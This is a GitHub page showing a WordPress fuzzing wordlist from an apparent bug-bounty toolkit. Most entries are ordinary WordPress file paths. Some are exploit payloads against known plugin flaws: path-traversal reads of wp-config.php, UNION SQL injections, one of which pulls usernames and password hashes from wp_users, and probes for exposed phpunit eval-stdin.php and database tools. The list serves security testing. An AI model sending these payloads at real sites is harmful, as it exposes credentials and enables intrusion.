forked from 0xPugal/fuzz4bounty
-
Notifications
You must be signed in to change notification settings - Fork 0
Expand file tree
/
Copy pathwordpress.txt
More file actions
1113 lines (1113 loc) · 23.3 KB
/
Copy pathwordpress.txt
File metadata and controls
1113 lines (1113 loc) · 23.3 KB
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
333
334
335
336
337
338
339
340
341
342
343
344
345
346
347
348
349
350
351
352
353
354
355
356
357
358
359
360
361
362
363
364
365
366
367
368
369
370
371
372
373
374
375
376
377
378
379
380
381
382
383
384
385
386
387
388
389
390
391
392
393
394
395
396
397
398
399
400
401
402
403
404
405
406
407
408
409
410
411
412
413
414
415
416
417
418
419
420
421
422
423
424
425
426
427
428
429
430
431
432
433
434
435
436
437
438
439
440
441
442
443
444
445
446
447
448
449
450
451
452
453
454
455
456
457
458
459
460
461
462
463
464
465
466
467
468
469
470
471
472
473
474
475
476
477
478
479
480
481
482
483
484
485
486
487
488
489
490
491
492
493
494
495
496
497
498
499
500
501
502
503
504
505
506
507
508
509
510
511
512
513
514
515
516
517
518
519
520
521
522
523
524
525
526
527
528
529
530
531
532
533
534
535
536
537
538
539
540
541
542
543
544
545
546
547
548
549
550
551
552
553
554
555
556
557
558
559
560
561
562
563
564
565
566
567
568
569
570
571
572
573
574
575
576
577
578
579
580
581
582
583
584
585
586
587
588
589
590
591
592
593
594
595
596
597
598
599
600
601
602
603
604
605
606
607
608
609
610
611
612
613
614
615
616
617
618
619
620
621
622
623
624
625
626
627
628
629
630
631
632
633
634
635
636
637
638
639
640
641
642
643
644
645
646
647
648
649
650
651
652
653
654
655
656
657
658
659
660
661
662
663
664
665
666
667
668
669
670
671
672
673
674
675
676
677
678
679
680
681
682
683
684
685
686
687
688
689
690
691
692
693
694
695
696
697
698
699
700
701
702
703
704
705
706
707
708
709
710
711
712
713
714
715
716
717
718
719
720
721
722
723
724
725
726
727
728
729
730
731
732
733
734
735
736
737
738
739
740
741
742
743
744
745
746
747
748
749
750
751
752
753
754
755
756
757
758
759
760
761
762
763
764
765
766
767
768
769
770
771
772
773
774
775
776
777
778
779
780
781
782
783
784
785
786
787
788
789
790
791
792
793
794
795
796
797
798
799
800
801
802
803
804
805
806
807
808
809
810
811
812
813
814
815
816
817
818
819
820
821
822
823
824
825
826
827
828
829
830
831
832
833
834
835
836
837
838
839
840
841
842
843
844
845
846
847
848
849
850
851
852
853
854
855
856
857
858
859
860
861
862
863
864
865
866
867
868
869
870
871
872
873
874
875
876
877
878
879
880
881
882
883
884
885
886
887
888
889
890
891
892
893
894
895
896
897
898
899
900
901
902
903
904
905
906
907
908
909
910
911
912
913
914
915
916
917
918
919
920
921
922
923
924
925
926
927
928
929
930
931
932
933
934
935
936
937
938
939
940
941
942
943
944
945
946
947
948
949
950
951
952
953
954
955
956
957
958
959
960
961
962
963
964
965
966
967
968
969
970
971
972
973
974
975
976
977
978
979
980
981
982
983
984
985
986
987
988
989
990
991
992
993
994
995
996
997
998
999
1000
?author=1
2020/
404.php
about.htm
about.js
about.php
accordion.js
accordion.min.js
admin-ajax.php
admin-ajax.php?action=ave_publishPost&title=random&short=1&term=1&thumb=../wp-config.php
admin-ajax.php?action=duplicator_download&file=dupl.txt
admin-ajax.php?action=hc_ajax_save_option
admin-ajax.php?action=import_csv
admin-ajax.php?action=kbslider_show_image&img=../wp-config.php
admin-ajax.php?action=revslider_show_image&img=../wp-config.php
admin-ajax.php?action=rss&type=video&vid=-1%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,md5(2349819),24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39%23
admin-ajax.php?action=save_map_name
admin-ajax.php?action=wdt_upload_file
admin-ajax.php?do_reset_wordpress=1
admin-ajax.php?page=wppcp-security-settings-page
admin-ajax.php?page=wppcp-settings
admin-bar.css
admin-bar.min.css
admin-bar-rtl.css
admin-bar-rtl.min.css
admin-db.php
admin-footer.php
admin-functions.php
admin-header.php
admin.php
/admin.php?page=miwoftp&option=com_miwoftp&action=download&item=wp-config.php&order=name&srt=yes
admin-post.php
/admin-post.php?page=wpim_manage_settings
/admin-post.php?page=wpsm_responsive_coming_soon
/admin-post.php?yp_remote_get=test
admin/wp-login.php
advanced
ajax-actions.php
akismet.js
akismet.php
alert.gif
anchor.htm
anchor.js
archive.php
archives.php
async-upload.php
attachment.php
author-bio.php
author.php
autosave
berries.jpg
berries-thumbnail.jpg
blank.htm
blog/
blogger.php
blogware.php
blog/wp-content/wp-phpmyadmin/phpmyadmin/scripts/setup.php
blog/wp-login.php
bookmarklet.php
bookmark.php
border-anim-h.gif
border-anim-v.gif
builder.js
button_bg_black.png
button_bg.png
button_bg_silver.png
button.gif
buttons.css
buttons.gif
buttons.min.css
cat.dev.js
categories.dev.js
categories.js
categories.min.js
categories.php
category.php
cat.js
cat.min.js
changelog.txt
charmap.htm
charmap.js
cherryblossoms.jpg
cherryblossoms-thumbnail.jpg
circle.png
circle-thumbnail.png
classes
class-ftp.php
class-ftp-pure.php
class-ftp-sockets.php
class-pclzip.php
class-wp-comments-list-table.php
class-wp-filesystem-base.php
class-wp-filesystem-direct.php
class-wp-filesystem-ftpext.php
class-wp-filesystem-ftpsockets.php
class-wp-filesystem-ssh2.php
class-wp-importer.php
class-wp-links-list-table.php
class-wp-list-table.php
class-wp-media-list-table.php
class-wp-ms-sites-list-table.php
class-wp-ms-themes-list-table.php
class-wp-ms-users-list-table.php
class-wp-plugin-install-list-table.php
class-wp-plugins-list-table.php
class-wp-posts-list-table.php
class-wp-terms-list-table.php
class-wp-theme-install-list-table.php
class-wp-themes-list-table.php
class-wp-upgrader.php
class-wp-users-list-table.php
clearlooks2/
color_picker.htm
color-picker.js
color_picker.js
color-picker.min.js
comment.dev.js
comment.js
comment.min.js
comment.php
comments.php
comments-popup.php
common.dev.js
common.js
common.min.js
concave.jpg
concave-thumbnail.jpg
config.php
confirm.gif
content-aside.php
content-audio.php
content-chat.php
content.css
content-gallery.php
content-image.php
content-link.php
content-none.php
content-page.php
content.php
content-quote.php
content-status.php
content-video.php
continents-cities.php
controls.js
controls.svg
corners.gif
credits.php
css
css/
css/content.css
css/editor-style.css
css/ie.css
css/wp-fullscreen.css
custom-background.dev.js
custom-background.js
custom-background.min.js
custom-background.php
custom-fields.dev.js
custom-fields.js
custom-fields.min.js
custom-header.js
custom-header.php
customize-controls.js
customize-controls.min.js
customize.php
dashboard.dev.js
dashboard.js
dashboard.min.js
dashboard.php
dbx-admin-key.js
deprecated.php
dialog.css
diamond.png
diamond-thumbnail.png
Diff.php
directionality
dotclear.php
dragdrop.js
drag.gif
editable_selects.js
edit-attachment-rows.php
edit-category-form.php
edit-comments.dev.js
edit-comments.js
edit-comments.min.js
edit-comments.php
edit-form-advanced.php
edit-form-comment.php
edit-form.php
editimage.css
editimage.html
editimage.js
editimage.min.js
edit-link-categories.php
edit-link-category-form.php
edit-link-form.php
editor.css
editor.dev.js
editor.js
editor.min.css
editor.min.js
editor_plugin.dev.js
editor_plugin.js
editor_plugin_src.js
editor-style.css
editor-style-rtl.css
editor_template.js
editor_template_src.js
edit-page-form.php
edit-pages.php
edit.php
edit-post-rows.php
edit-tag-form.php
edit-tags.php
effects.js
embed.js
EnchantSpell.php
export.php
farbtastic.js
fern.jpg
fern-thumbnail.jpg
file-manager/
file.php
flashmediaelement.swf
fonts/
fonts/COPYING.txt
fonts/genericons.css
fonts/genericons-regular-webfont.eot
fonts/genericons-regular-webfont.svg
fonts/genericons-regular-webfont.ttf
fonts/genericons-regular-webfont.woff
fonts/LICENSE.txt
footer.php
forestfloor.jpg
forestfloor-thumbnail.jpg
form_utils.js
freedoms.php
fullscreen
fullscreen.htm
functions.js
functions.php
gallery.dev.js
gallery.js
gallery.min.js
gears-manifest.php
general.php
getid3.lib.php
getid3.php
GoogleSpell.php
greymatter.php
handlers.dev.js
handlers.js
handlers.min.js
header.php
horizontal.gif
html5.js
image-edit.dev.js
image-edit.js
image-edit.min.js
image-edit.php
image.htm
image.js
image.php
images
images/
images/audio.jpg
images/dotted-line-2x.png
images/dotted-line-light-2x.png
images/dotted-line-light.png
images/dotted-line.png
images/header-img.php
images/headers
images/search-icon-2x.png
images/search-icon.png
images/wordpress.png
img
img/
imgareaselect.css
img/buttons.png
img/logo@2x.png
img/logo.png
img/t.gif
img/wline.gif
import
import.php
inc/
inc/back-compat.php
inc/custom-header.php
includes
index-extra.php
index.php
inkwell.jpg
inkwell-thumbnail.jpg
inline-edit-post.dev.js
inline-edit-post.js
inline-edit-post.min.js
inline-edit-tax.dev.js
inline-edit-tax.js
inline-edit-tax.min.js
inline.php
inlinepopups
install.css
install-helper.php
install.php
install-rtl.css
interface.js
iris.min.js
Jcrop.gif
jquery.color.dev.js
jquery.color.js
jquery.color.min.js
jquery.form.dev.js
jquery.form.js
jquery.form.min.js
jquery.hotkeys.dev.js
jquery.hotkeys.js
jquery.hotkeys.min.js
jquery.imgareaselect.dev.js
jquery.imgareaselect.js
jquery.imgareaselect.min.js
jquery.Jcrop.css
jquery.Jcrop.dev.js
jquery.Jcrop.js
jquery.Jcrop.min.css
jquery.Jcrop.min.js
jquery.js
jquery.masonry.min.js
jquery-migrate.js
jquery-migrate.min.js
jquery.query.js
jquery.schedule.js
jquery.serialize-object.js
jquery.table-hotkeys.dev.js
jquery.table-hotkeys.js
jquery.table-hotkeys.min.js
jquery.ui.accordion.min.js
jquery.ui.autocomplete.min.js
jquery.ui.button.min.js
jquery.ui.core.min.js
jquery.ui.datepicker.min.js
jquery-ui-dialog.css
jquery-ui-dialog.min.css
jquery.ui.dialog.min.js
jquery.ui.draggable.min.js
jquery.ui.droppable.min.js
jquery.ui.effect-blind.min.js
jquery.ui.effect-bounce.min.js
jquery.ui.effect-clip.min.js
jquery.ui.effect-drop.min.js
jquery.ui.effect-explode.min.js
jquery.ui.effect-fade.min.js
jquery.ui.effect-fold.min.js
jquery.ui.effect-highlight.min.js
jquery.ui.effect.min.js
jquery.ui.effect-pulsate.min.js
jquery.ui.effect-scale.min.js
jquery.ui.effect-shake.min.js
jquery.ui.effect-slide.min.js
jquery.ui.effect-transfer.min.js
jquery.ui.menu.min.js
jquery.ui.mouse.min.js
jquery.ui.position.min.js
jquery.ui.progressbar.min.js
jquery.ui.resizable.min.js
jquery.ui.selectable.min.js
jquery.ui.slider.min.js
jquery.ui.sortable.min.js
jquery.ui.spinner.min.js
jquery.ui.tabs.min.js
jquery.ui.tooltip.min.js
jquery.ui.touch-punch.js
jquery.ui.widget.min.js
js
jscripts
jscripts/
langs
langs/
langs/en.js
langs/wp-langs-en.js
langs/wp-langs.php
languages/
languages/twentyten.pot
languages/twentytwelve.pot
legacy.php
license.commercial.txt
license.html
license.txt
link-add.php
link-category.php
link.dev.js
link.htm
link-import.php
link.js
link-manager.php
link.min.js
link-parse-opml.php
link.php
links.php
list-table.php
livejournal.php
loading.gif
load-scripts.php
load-styles.php
log.txt
loop.php
maint/
maint/repair.php
manifest.php
mark_loaded_src.js
mclayer.js
mctabs.js
media/
media.css
media.dev.js
mediaelement-and-player.min.js
mediaelementplayer.min.css
media-gallery.js
media-gallery.min.js
media.htm
media.js
media.min.js
media-new.php
media.php
media-upload.dev.js
media-upload.js
media-upload.min.js
media-upload.php
media-views.css
media-views.min.css
media-views-rtl.css
media-views-rtl.min.css
menu-header.php
menu.php
meta-boxes.php
misc.php
MIT-LICENSE
moderation.php
module.audio.ac3.php
module.audio.dts.php
module.audio.flac.php
module.audio.mp3.php
module.audio.ogg.php
module.audio-video.asf.php
module.audio-video.flv.php
module.audio-video.matroska.php
module.audio-video.quicktime.php
module.audio-video.riff.php
module.tag.apetag.php
module.tag.id3v1.php
module.tag.id3v2.php
module.tag.lyrics3.php
moxieplayer.swf
ms-admin.php
ms-delete-site.php
ms-deprecated.php
ms-edit.php
ms-options.php
ms.php
ms-sites.php
ms-themes.php
ms-upgrade-network.php
ms-users.php
mt.php
my-sites.php
native.php
navigation.js
nav-menu.dev.js
nav-menu.js
nav-menu.min.js
nav-menu.php
nav-menus.php
network
network.php
new/
old/
oldsite/
onecolumn-page.php
options-discussion.php
options-general.php
options-head.php
options-media.php
options-misc.php
options-permalink.php
options.php
options-privacy.php
options-reading.php
options-writing.php
page-new.php
page.php
page-templates/
page-templates/front-page.php
page-templates/full-width.php
password-strength-meter.dev.js
password-strength-meter.js
password-strength-meter.min.js
paste
pastetext.htm
pastetext.js
pasteword.htm
pasteword.js
path.jpg
path-thumbnail.jpg
plugin-editor.php
plugin-install.dev.js
plugin-install.js
plugin-install.min.js
plugin-install.php
/plugin-install.php?tab=upload
plugin.php
plugins
plugins.php
plupload.flash.js
plupload.flash.swf
plupload.html4.js
plupload.html5.js
plupload.js
plupload.silverlight.js
plupload.silverlight.xap
popup.js
popup.min.js
popups.css
postbox.dev.js
postbox.js
postbox.min.js
post.dev.js
post.js
post.min.js
/post-new.php
post-new.php
post.php
press-this.php
profile.php
profile-update.php
prototype.js
PSpell.php
PSpellShell.php
readme.html
readme.txt
Renderer.php
revision.php
revisions.js
revisions-js.php
revisions.min.js
rpc.php
rss.php
rtl.css
safari
schema.php
screen.php
screenshot.png
scriptaculous.js
searchform.php
search.php
set-post-thumbnail.dev.js
set-post-thumbnail.js
set-post-thumbnail.min.js
settings.php
setup-config.php
setup.php
shell.php
shortcuts.htm
sidebar-footer.php
sidebar-front.php
sidebar-main.php
sidebar.php
silverlightmediaelement.xap
single.php
site-info.php
site-new.php
site-settings.php
sites.php
site-themes.php
site-users.php
skins
skins/
skins/clearlooks2/window.css
skins/default
skins/o2k7/
skins/o2k7/content.css
skins/o2k7/dialog.css
skins/o2k7/ui_black.css
skins/o2k7/ui.css
skins/o2k7/ui_silver.css
slider.js
sound.js
source_editor.htm
source_editor.js
spellchecker
SpellChecker.php
star.png
star-thumbnail.png
string.php
style.css
suggest.dev.js
suggest.js
suggest.min.js
sunset.jpg
sunset-thumbnail.jpg
swfupload-all.js
swfupload.cookies.js
swfupload.js
swfupload.queue.js
swfupload.speed.js
swfupload.swf
swfupload.swfobject.js
tabfocus/
tag.php
tags.dev.js
tags.js
tags.min.js
taxonomy.php
taxonomy-post_format.php
template.htm
template.php
templates.php
test/
test/wp-login.php
textpattern.php
theme-customizer.js
/theme-editor.php
theme-editor.php
theme-install.php
theme.js
theme.min.js
theme.php
theme-preview.dev.js
theme-preview.js
theme-preview.min.js
themes/
themes.php
tiny_mce_config.php
tiny_mce_gzip.php
tiny_mce.js
tiny_mce_popup.js
tinyspell.php
tools.php
twentythirteen/
twentythirteen.pot
ui
ui.core.js
ui.css
ui.dialog.js
ui.draggable.js
ui.droppable.js
ui.resizable.js
ui.selectable.js
ui.sortable.js
ui.tabs.js
unittest.js
update-core.php
update-links.php
update.php
upgrade-functions.php
upgrade.php
upgrade-schema.php
upload.css
upload-functions.php
upload.js
upload.php
upload-rtl.css
user/
user/about.php
user/admin.php
user/credits.php
user-edit.php
user/freedoms.php
user/index.php
user/menu.php
user-new.php
user.php
user-profile.dev.js
user-profile.js
user-profile.min.js
user/profile.php
users.js
users.php
user-suggest.js
user-suggest.min.js
user/user-edit.php
utils/
utils.dev.js
utils.js
utils/JSON.php
utils/Logger.php
validate.js
vertical.gif
widget.php
widgets.css
widgets.dev.js
widgets.js
widgets.min.js
widgets.php
widgets-rtl.css
word-count.dev.js
word-count.js
word-count.min.js
wordpress/
wordpress.css
wordpress.php
wordpress/wp-content/wp-phpmyadmin/phpmyadmin/scripts/setup.php
wordpress/wp-login.php
wp-
wp1/wp-login.php
wp2/wp-login.php
wp-activate.php
wp-admin
wp-admin-bar.js
wp-admin-bar.min.js
wp-admin-bar.php
wp-admin.css
wp-app.php
wp-atomlib.php
wp-atom.php
wp-auth-check.css
wp-auth-check.min.css
wp-author-template.php
wp-autosave.dev.js
wp-autosave.js
wp-autosave.min.js
wp-backbone.min.js
wp-blog-header.php
wp-bookmark.php
wp-bookmark-template.php
wp-cache.php
wp-canonical.php
wp-capabilities.php
wp-category.php
wp-category-template.php
wp-classes.php
wp-class-feed.php
wp-class-http.php
wp-class-IXR.php
wp-class-json.php
wp-class-oembed.php
wp-class-phpass.php
wp-class-phpmailer.php
wp-class-pop3.php
wp-class-simplepie.php
wp-class-smtp.php
wp-class-snoopy.php
wp-class-wp-admin-bar.php
wp-class-wp-ajax-response.php
wp-class-wp-customize-control.php
wp-class-wp-customize-manager.php
wp-class-wp-customize-section.php
wp-class-wp-customize-setting.php
wp-class.wp-dependencies.php
wp-class-wp-editor.php
wp-class-wp-embed.php
wp-class-wp-error.php
wp-class-wp-http-ixr-client.php
wp-class-wp-image-editor-gd.php
wp-class-wp-image-editor-imagick.php
wp-class-wp-image-editor.php
wp-class-wp.php
wp-class.wp-scripts.php
wp-class.wp-styles.php
wp-class-wp-theme.php
wp-class-wp-walker.php
wp-class-wp-xmlrpc-server.php
wp-colorpicker.dev.js
wp-colorpicker.js
wp-colorpicker.min.js
wp-comment.php
wp-comment-reply.dev.js
wp-comment-reply.js
wp-comment-reply.min.js
wp-comments-post.php
wp-commentsrss2.php
wp-comment-template.php
wp-compat.php
/wp-config.php
/wp-config.php~
wp-config.php
/wp-config.php?aam-media=1
/wp-config.php-bak
/wp-config.php.bak
/wp-config.php_bak
/wp-config.php.new
/wp-config.php_new
/wp-config.php.old
/wp-config.php_old
/wp-config.php_Old
wp-config.php.stage
wp-config-sample.php
wp-content/
/wp-content/accessally/resource/backend/css/accessally-manage.css
/wp-content/adminer/inc/editor/index.php
/wp-content/adminer.php
/wp-content/ajax_multi_upload/readme.txt
wp-content/akismet
/wp-content/all-video-gallery/config.php?vid=1&pid=-1+union+select+1,2,3,4,concat(0x7e7e7e,74657374,0x7c7c7c,md5(74657374),0x7e7e7e),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41+--
/wp-content/aviary-image-editor-add-on-for-gravity-forms/upload.php
/wp-content/batchmove/batch.js
/wp-content/blaze-slide-show-for-wordpress/swfupload/upload.php
/wp-content/blnmrpb/log.txt
/wp-content/brizy/public/static/css/style.css
/wp-content/CCSlider/upload.php
/wp-content/cherry-plugin/admin/css/cherry-admin-plugin.css
/wp-content/cherry-plugin/admin/import-export/download-content.php?file=../../../../../wp-config.php
wp-content/cloudflare/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php
/wp-content/contact-form-7/readme.txt
/wp-content/contus-hd-flv-player/uploadVideo.php
/wp-content/contus-video-galleryversion-10/upload1.php
wp-content/dzs-videogallery/class_parts/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php
/wp-content/force-download.php?file=../../../../../../../wp-config.php
/wp-content/front-file-manager/readme.txt
/wp-content/google-document-embedder/libs/pdf.php?fn=lol.pdf&file=../../../../wp-config.php
/wp-content/google-mp3-audio-player/direct_download.php?file=../../../wp-config.php
/wp-content/hd-webplayer/playlist.php?videoid=1+and+1=2+/*!union*/+/*!select*/+concat(0x7e7e7e,user_login,0x7c7c7c,user_pass,0x7e7e7e),2,3,4,5,6,7,8,9,10,11+from+wp_users
wp-content/hello.php
/wp-content/html5avmanager/lib/uploadify/uploadify.css
/wp-content/image-clipboard/readme.txt
/wp-content/inboundio-marketing/admin/partials/csv_uploader.php
/wp-content/indeed-membership-pro/assets/css/templates.css
wp-content/index.php
/wp-content/iwp-client/clipboard.min.js
/wp-content/iwp-client/readme.txt
/wp-content/jekyll-exporter/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php
wp-content/jekyll-exporter/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php
/wp-content/jssor-slider/assets/css/jssor-slider.css
/wp-content/linklove/linklove.php?s=true
/wp-content/mac-dock-gallery/readme.txt
/wp-content/mailcwp/mailcwp-upload.php
/wp-content/mini-mail-dashboard-widgetwp-mini-mail.php?abspath=../../wp-config.php
wp-content/mm-plugin/inc/vendors/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php
/wp-content/mygallery/myfunctions/mygallerybrowser.php?myPath=../../../../wp-config.php
/wp-content/portable-phpmyadmin/wp-pma-mod/index.php
wp-content/prh-api/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php
/wp-content/profile-builder/assets/css/serial-notice.css
/wp-content/profile-builder/assets/css/style-front-end.css
/wp-content/profile-builder-pro/assets/css/style-front-end.css
wp-content/realia/libraries/PayPal-PHP-SDK/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php
/wp-content/recent-backups/download-file.php?file_link=../../../wp-config.php
/wp-content/reflex-gallery/admin/scripts/FileUploader/php.php
/wp-content/revslider/temp/update_extract/readme.php
/wp-content/simple-image-manipulator/controller/download.php?filepath=../../../wp-config.php
/wp-content/slide-show-pro/swfupload/upload.php
/wp-content/smart-slide-show/swfupload/upload.php
/wp-content/sniplets/modules/syntax_highlight.php?libpath=../../../../wp-config.php
/wp-content/strong-testimonials/templates/modern/content.css
/wp-content/tera-charts/charts/treemap.php?fn=../../../../wp-config.php
/wp-content/themegrill-demo-importer/assets/admin/demo-importer.js
wp-content/themes
/wp-content/themes/churchope/lib/downloadlink.php?file=../../../../wp-config.php
wp-content/themes/default
/wp-content/themes/infocus/lib/scripts/dl-skin.php
/wp-content/themes/linenity/functions/download.php?imgurl=theme-functions.php&name=theme-functions.php
/wp-content/themes/mTheme-Unus/css/css.php?files=../../../../wp-config.php
/wp-content/themes/NativeChurch/download/download.php?file=../../../../wp-config.php
/wp-content/themes/twentynineteen/404.php
wp-content/themes/twentyten
/wp-content/themes/twentytwenty/404.php
/wp-content/themes/wp-update.php
/wp-content/uploadify/check.php
/wp-content/uploadify/readme.txt
/wp-content/uploads/
wp-content/uploads/2018/01/abc/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php
/wp-content/uploads/adminer.php
/wp-content/woopra/inc/php-ofc-library/ofc_upload_image.php?name=verify.php
/wp-content/wordpress-database-reset/assets/css/bsmselect.css
/wp-content/wp-central/readme.txt
/wp-content/wpematico/app/wpe_hooks.js
/wp-content/wp-phpmyadmin/wp-phpmyadmin/phpmyadmin/
/wp-content/wp-private-content-plus/css/wppcp-front.css
/wp-content/wpshopify/dist/public.min.css
/wp-content/wptf-image-gallery/lib-mbox/ajax_load.php?url=../../../../wp-config.php
/wp-content/wp-time-capsule/opentip-jquery.js
/wp-content/wp-time-capsule/treeView/common.js
/wp-content/wp-time-capsule/wptc-dialog.css
/wp-content/yellow-pencil-visual-theme-customizer/yellow-pencil.js
/wp-content/yuzo-related-post/assets/admin.js
wp-cron.php
wp-crop/
wp-crop/cropper.css
wp-crop/cropper.js
wp-css
wp-customize-base.js
wp-customize-base.min.js
wp-customize-loader.js
wp-customize-loader.min.js
wp-customize-preview.js
wp-customize-preview.min.js
wp-dbx.js
wp-default-constants.php
wp-default-embeds.php
wp-default-filters.php
wp-default-widgets.php
wp-deprecated.php
wpdialog.js
wpdialog.min.js
wpdialogs
wpeditimage
wp-fat.js
wp-feed-atom-comments.php
wp-feed-atom.php
wp-feed.php
wp-feed-rdf.php
wp-feed-rss2-comments.php
wp-feed-rss2.php
wp-feed-rss.php
wp-formatting.php
wpfullscreen
wp-fullscreen.js
wp-fullscreen.min.js
wp-functions.php
wp-functions.wp-scripts.php
wp-functions.wp-styles.php
wpgallery
wp-general-template.php
wp-gettext.php
wp-heartbeat.js
wp-heartbeat.min.js
wphelp
wp-hoverIntent.dev.js
wp-hoverIntent.js
wp-hoverIntent.min.js
wp-http.php
wp-ID3
wp-images/
wp-images/wlw/
wp-imgareaselect
wp/install.php
wp-jcrop
wp-jquery
wp-json/
wp-json2.dev.js
wp-json2.js
wp-json2.min.js
wp-json/wp/v2/posts
wp-json/wp/v2/users
wp-json/wp/v2/users/1
wp-kses.php
wp-l10n.php
wplink
wp-links-opml.php
wp-link-template.php
wp-list-manipulation.js
wp-load.php
wp-locale.php
/wp-login.php
wp-login.php
/wp-login.php?action=register
wp-mail.php
wp-mce-help.php
wp-mce-view.js
wp-mce-view.min.js
wp-media-editor.js
wp-media-editor.min.js
wp-mediaelement
wp-mediaelement.css
wp-mediaelement.js
wp-media-models.js
wp-media-models.min.js
wp-media.php
wp-media-template.php
wp-media-views.js
wp-media-views.min.js
wp-meta.php
wp-ms-blogs.php
wp-ms-default-constants.php
wp-ms-default-filters.php
wp-ms-deprecated.php
wp-ms-files.php
wp-ms-functions.php
wp-ms-load.php
wp-ms-settings.php
wp-nav-menu.php
wp-nav-menu-template.php
wp-option.php
wp-pass.php
wp-pluggable-deprecated.php
wp-pluggable.php
wp-plugin.php
wp-plupload
wp-plupload.js
wp-plupload.min.js
wp-pointer.css
wp-pointer.min.css
wp-pomo/
wp-pomo/entry.php
wp-pomo/mo.php
wp-pomo/po.php
wp-pomo/streams.php
wp-pomo/translations.php
wp-post-formats.php
wp-post.php
wp-post-template.php
wp-post-thumbnail-template.php
wp-prototype.js
wp-query.php
wp-quicktags.dev.js
wp-quicktags.js
wp-quicktags.min.js
wp-rdf.php
wp-register.php
wp-registration-functions.php
wp-registration.php
wp-revision.php
wp-rewrite.php